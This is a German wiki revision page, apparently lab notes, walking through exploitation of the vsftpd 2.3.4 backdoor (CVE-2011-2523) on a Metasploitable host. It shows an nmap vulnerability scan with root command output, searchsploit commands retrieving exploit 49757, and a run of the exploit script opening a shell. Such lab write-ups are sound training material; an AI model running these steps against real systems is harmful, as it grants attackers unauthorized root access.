Vsftp4-angriff: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 32: | Zeile 32: | ||
==Searchsploit== | ==Searchsploit== | ||
| − | *searchsploit vsftpd 2.3.4 | + | *searchsploit vsftpd 2.3.4 |
| + | *searchsploit -m 49757 unix/remote/49757.py | ||
| + | |||
==Nach Exploit googlen== | ==Nach Exploit googlen== | ||
;CVE-2011-2523 exploit-db | ;CVE-2011-2523 exploit-db | ||
Version vom 27. Oktober 2021, 20:07 Uhr
Angreifer
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST Nmap scan report for metaspoitable.hack.lab (10.0.10.105) Host is up (0.00088s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: BID:48539 CVE:CVE-2011-2523 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | https://www.securityfocus.com/bid/48539 |_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html MAC Address: 0C:67:68:58:00:00 (Unknown) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
Searchsploit
- searchsploit vsftpd 2.3.4
- searchsploit -m 49757 unix/remote/49757.py
Nach Exploit googlen
- CVE-2011-2523 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened Send `exit` to quit shell